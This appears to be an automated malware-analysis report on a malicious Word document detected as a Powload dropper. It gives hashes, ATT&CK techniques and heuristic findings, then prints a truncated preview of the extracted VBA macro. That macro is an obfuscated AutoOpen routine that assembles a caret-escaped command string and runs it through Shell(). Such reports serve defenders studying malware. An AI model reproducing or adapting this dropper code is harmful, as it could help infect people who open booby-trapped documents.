Office (OLE) malware analysis — malicious · 9b2a0112109a8de3

MALICIOUS

Office (OLE)

71.9 KB Created: 2018-08-31 08:04:00 Authoring application: Microsoft Office Word First seen: 2019-03-18

MD5: 023e4eefc9d7445e29850c4df4b217d5 SHA-1: db95b6d83ff8f0c86d3050d8a31cc0a259370b7b SHA-256: 9b2a0112109a8de3a07ef2f0eb3a17e454096f778e96ce151d103151cfd7313c

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a legacy WordBasic AutoOpen macro that utilizes the Shell() function. This macro constructs and executes a command string, likely to download and run a second-stage payload. The ClamAV detection 'Doc.Dropper.Powload-6922842-0' further supports the dropper functionality.

Heuristics 6

ClamAV: Doc.Dropper.Powload-6922842-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Powload-6922842-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7409 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7409 bytes
SHA-256: `7e28454aa2bf18a1a5edf217d64e182e8a5492d7956ca4c795ce6d0d31fb0e76`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "jOzcCcYkP" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On _ Error _ Resume _ Next Hour 84627 * bEzNX * 49206 / VVCRp Hour 22186 / tzjYYV Shell KeyString(6 + 2 + 2 + 6 + 51) + PdLasCiA + JcFZCzj + ivvtrurcH + fBzVk + vpjKKZo + zzBWzQVnNi + CsCFfUBshZTq + qwuOicTYQhb, 38 - 38 Hour 18810 * ZharpZ / QMXfF / KzbnNr Hour 56824 / OSAwb Hour 28839 * HjBEQi / 53965 / 40297 End Sub Attribute VB_Name = "IalXiYlJaptOJ" Function ivvtrurcH() On _ Error _ Resume _ Next Hour 93021 * FJfjJ * 68958 / PrIELn Hour 86321 / JzWrpi * 55054 * ibidW mzRMK = "md /V^:" + "^O/C" + Chr(4 + 1 + 3 + 4 + 22) + "^s^e" + "t ^UZ^" + "z===A^" + "A^g^" + "A" + "A" Hour 40182 / NcwLk / 48998 * HAhiQ Hour 74861 / bRWqDc * 61576 * WQbWij Hour 32757 / rAuDZj * 4175 * zqmTAt irDnUnjC = "I^AA" + "C^Ag" + "AA^IAAC" + "^A" + "^gA" + "^AI^A" + "ACA^" Hour 41474 * 95905 Hour qnAKo * rrCjD * BZCznf / lrvULw FNfSQOo = "gA^AI" + "^A" + "^AC^Ag" + "A^AIA^A" + "C^" Hour arSvS / Oqvtlh / 40766 * rhzVj Hour rEUah * dCjDL * 44821 * wkwQjT sAMIbrGM = "Ag^" + "AAI^A^0" + "H" + "^A" + "^9B^w" + "^e^" + "A" + "g^G^A" + "j" + "B^" Hour 77843 * apbnt Hour ifYXML * EOmHA * 32506 * CiObP hLwDrF = "AdA^E^G" + "A^jB^Q" + "^f^As^" + "D^ArB" + "^" Hour diVHHu * JYFiv / RjozC * PoEPH Hour 27311 / DkcJmX * cDqqfw / 49870 Hour MVwdcP * 13253 * 86533 / mvGcI ZBWEzm = "QYAUGA" + "^y^Bg^" + "Y^" + "A" + "s^D^" + "As^" + "B" + "AU^A^AH" ivvtrurcH = mzRMK + irDnUnjC + FNfSQOo + sAMIbrGM + hLwDrF + ZBWEzm Hour 29041 / oJhvL Hour joAElG * fvVFG Hour vvVTiS / uaOwz Hour 56866 * ofBzs End Function Function fBzVk() On _ Error _ Resume _ Next Hour kGjuV * HhPzz * 46709 / tLZJaH Hour 2759 / qXiSTa * HoDVL / kJJmV Hour wHWqEm * LUrBj / 82460 * wETpsr Hour 47085 / 26713 rftwaqAvHY = "Ak^" + "AA^" + "I" + "A0" + "G^AlB" + "^AdA" + "k^" + "EA" + "t^A^Q" + "ZA" + "s^GAv" + "^Bg^" + "d^A^" Hour bAzOs / 32523 Hour 46629 / YkzMOE Hour 55737 * lDvrbi YJRZozq = "4" + "GA" + "^" + "JBw" + "OA^k" Hour 5165 * iVnZz * 67445 * RUmwzQ okaLHU = "C^A" + "s" + "^BA" + "U^AAH" + "Ak" + "A^AI" + "AwC^A" + "^Y^B" + "^gZ^A" + "cH^AkA" Hour 16678 / qiLCMP GMAadK = "^" + "AKAU^G" + "^As" + "B^QaAYE" + "A^" + "k" + "^BQYA^" + "8^G^A^s" + "BgbA" Hour 88922 * nzBdiL * 6766 / Bnbwf azbkX = "cH" + "^Av^" + "B" + "AR^A^4" + "C^AYBgc" + "^A" + "^A^H" + "^A" + "k" + "^Awe" + "A^kHA^" Hour 61518 * qwVGjE Hour 16638 / oonoMS ELtzzNjWEL = "y^B^A" + "^" + "d^A^s" + "^" + "HA^pAwc" + "Ag^G^AF" + "^B^A^" Hour UTIPl / EdVOr afZqcCXjoPD = "JA^ACA" + "u" + "^BQ^a" + "AAC^" + "A" + "YB^gZ^" + "Ac^" + "H^" + "A^k^A^A" + "K^A^gG" + "^A^jBQ" + "YA" + "^UG^" Hour EYPfG / biIznU / juDWt * wfphY KhENK = "Ay" + "B^" + "w^b^A" + "Y^" + "G^A^7A^" + "wJ" + "AU" Hour UYwRcp * KcRHX Hour 68816 / ziosjv Hour JPMjzv / VpiXw * TMAjmp / TXCrd Hour 33393 / wdMYOq * 82133 / jErhiJ Hour 34014 / kIjBj QFMGwRD = "^G^" + "A^4" + "B^QZA" + "4CA" + "n^A^w" + "^K^A^MG" + "^AVBQV^" + "AQ" + "CArA^w^" + "J" Hour 40623 / Bdvkh Hour 14981 / huDVq / kTtrNs * AsThUm Hour scoRXj * ETtHo Hour 41824 / JVEiw EIARBuuNFE = "Aw" + "^FAn^A^" + "w^K" + "AM^" + "G" + "A^p^BA" + "bAIGA1^" + "B^Ac^" + "A^o" fBzVk = rftwaqAvHY + YJRZozq + okaLHU + GMAadK + azbkX + ELtzzNjWEL + afZqcCXjoPD + KhENK + QFMGwRD + EIARBuuNFE Hour soMCAh * rwvzWz Hour KuBbs * aFAnz Hour ZFWMfh / ozKQM * DEvAzO / iJMhhi Hour 54195 / ZIoRAK * dXzMS * 44288 Hour BUWUKR / 45347 End Function Function vpjKKZo() On _ Error _ Resume _ Next Hour 59180 * wamfn Hour wJUUo / 13968 * zLZSDM / INzQt Hour 65726 / LuhJUo / 90343 * tijYTD Hour hjnUn * FGKVF * jSJMzI / MwRHX ZKPUdWDGfOP = "^DA" + "2Bg^" + "bA^U^G" + "A^" + "k^AQ^" + "PA^" + "w^G^AQ" + "B^Ac^AQ" + "CA7^" ... (truncated)

SHA-256: 7e28454aa2bf18a1a5edf217d64e182e8a5492d7956ca4c795ce6d0d31fb0e76

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "jOzcCcYkP"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()

On _
Error _
Resume _
Next
   Hour 84627 * bEzNX * 49206 / VVCRp
   Hour 22186 / tzjYYV
Shell KeyString(6 + 2 + 2 + 6 + 51) + PdLasCiA + JcFZCzj + ivvtrurcH + fBzVk + vpjKKZo + zzBWzQVnNi + CsCFfUBshZTq + qwuOicTYQhb, 38 - 38
   Hour 18810 * ZharpZ / QMXfF / KzbnNr
   Hour 56824 / OSAwb
   Hour 28839 * HjBEQi / 53965 / 40297
End Sub



Attribute VB_Name = "IalXiYlJaptOJ"
Function ivvtrurcH()

On _
Error _
Resume _
Next
Hour 93021 * FJfjJ * 68958 / PrIELn
   Hour 86321 / JzWrpi * 55054 * ibidW
mzRMK = "md /V^:" + "^O/C" + Chr(4 + 1 + 3 + 4 + 22) + "^s^e" + "t ^UZ^" + "z===A^" + "A^g^" + "A" + "A"
Hour 40182 / NcwLk / 48998 * HAhiQ
   Hour 74861 / bRWqDc * 61576 * WQbWij
   Hour 32757 / rAuDZj * 4175 * zqmTAt
irDnUnjC = "I^AA" + "C^Ag" + "AA^IAAC" + "^A" + "^gA" + "^AI^A" + "ACA^"
Hour 41474 * 95905
   Hour qnAKo * rrCjD * BZCznf / lrvULw
FNfSQOo = "gA^AI" + "^A" + "^AC^Ag" + "A^AIA^A" + "C^"
Hour arSvS / Oqvtlh / 40766 * rhzVj
   Hour rEUah * dCjDL * 44821 * wkwQjT
sAMIbrGM = "Ag^" + "AAI^A^0" + "H" + "^A" + "^9B^w" + "^e^" + "A" + "g^G^A" + "j" + "B^"
Hour 77843 * apbnt
   Hour ifYXML * EOmHA * 32506 * CiObP
hLwDrF = "AdA^E^G" + "A^jB^Q" + "^f^As^" + "D^ArB" + "^"
Hour diVHHu * JYFiv / RjozC * PoEPH
   Hour 27311 / DkcJmX * cDqqfw / 49870
   Hour MVwdcP * 13253 * 86533 / mvGcI
ZBWEzm = "QYAUGA" + "^y^Bg^" + "Y^" + "A" + "s^D^" + "As^" + "B" + "AU^A^AH"
ivvtrurcH = mzRMK + irDnUnjC + FNfSQOo + sAMIbrGM + hLwDrF + ZBWEzm
   Hour 29041 / oJhvL
   Hour joAElG * fvVFG
   Hour vvVTiS / uaOwz
   Hour 56866 * ofBzs
End Function
Function fBzVk()

On _
Error _
Resume _
Next
Hour kGjuV * HhPzz * 46709 / tLZJaH
   Hour 2759 / qXiSTa * HoDVL / kJJmV
   Hour wHWqEm * LUrBj / 82460 * wETpsr
   Hour 47085 / 26713
rftwaqAvHY = "Ak^" + "AA^" + "I" + "A0" + "G^AlB" + "^AdA" + "k^" + "EA" + "t^A^Q" + "ZA" + "s^GAv" + "^Bg^" + "d^A^"
Hour bAzOs / 32523
   Hour 46629 / YkzMOE
   Hour 55737 * lDvrbi
YJRZozq = "4" + "GA" + "^" + "JBw" + "OA^k"
Hour 5165 * iVnZz * 67445 * RUmwzQ
okaLHU = "C^A" + "s" + "^BA" + "U^AAH" + "Ak" + "A^AI" + "AwC^A" + "^Y^B" + "^gZ^A" + "cH^AkA"
Hour 16678 / qiLCMP
GMAadK = "^" + "AKAU^G" + "^As" + "B^QaAYE" + "A^" + "k" + "^BQYA^" + "8^G^A^s" + "BgbA"
Hour 88922 * nzBdiL * 6766 / Bnbwf
azbkX = "cH" + "^Av^" + "B" + "AR^A^4" + "C^AYBgc" + "^A" + "^A^H" + "^A" + "k" + "^Awe" + "A^kHA^"
Hour 61518 * qwVGjE
   Hour 16638 / oonoMS
ELtzzNjWEL = "y^B^A" + "^" + "d^A^s" + "^" + "HA^pAwc" + "Ag^G^AF" + "^B^A^"
Hour UTIPl / EdVOr
afZqcCXjoPD = "JA^ACA" + "u" + "^BQ^a" + "AAC^" + "A" + "YB^gZ^" + "Ac^" + "H^" + "A^k^A^A" + "K^A^gG" + "^A^jBQ" + "YA" + "^UG^"
Hour EYPfG / biIznU / juDWt * wfphY
KhENK = "Ay" + "B^" + "w^b^A" + "Y^" + "G^A^7A^" + "wJ" + "AU"
Hour UYwRcp * KcRHX
   Hour 68816 / ziosjv
   Hour JPMjzv / VpiXw * TMAjmp / TXCrd
   Hour 33393 / wdMYOq * 82133 / jErhiJ
   Hour 34014 / kIjBj
QFMGwRD = "^G^" + "A^4" + "B^QZA" + "4CA" + "n^A^w" + "^K^A^MG" + "^AVBQV^" + "AQ" + "CArA^w^" + "J"
Hour 40623 / Bdvkh
   Hour 14981 / huDVq / kTtrNs * AsThUm
   Hour scoRXj * ETtHo
   Hour 41824 / JVEiw
EIARBuuNFE = "Aw" + "^FAn^A^" + "w^K" + "AM^" + "G" + "A^p^BA" + "bAIGA1^" + "B^Ac^" + "A^o"
fBzVk = rftwaqAvHY + YJRZozq + okaLHU + GMAadK + azbkX + ELtzzNjWEL + afZqcCXjoPD + KhENK + QFMGwRD + EIARBuuNFE
   Hour soMCAh * rwvzWz
   Hour KuBbs * aFAnz
   Hour ZFWMfh / ozKQM * DEvAzO / iJMhhi
   Hour 54195 / ZIoRAK * dXzMS * 44288
   Hour BUWUKR / 45347
End Function
Function vpjKKZo()

On _
Error _
Resume _
Next
Hour 59180 * wamfn
   Hour wJUUo / 13968 * zLZSDM / INzQt
   Hour 65726 / LuhJUo / 90343 * tijYTD
   Hour hjnUn * FGKVF * jSJMzI / MwRHX
ZKPUdWDGfOP = "^DA" + "2Bg^" + "bA^U^G" + "A^" + "k^AQ^" + "PA^" + "w^G^AQ" + "B^Ac^AQ" + "CA7^"
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.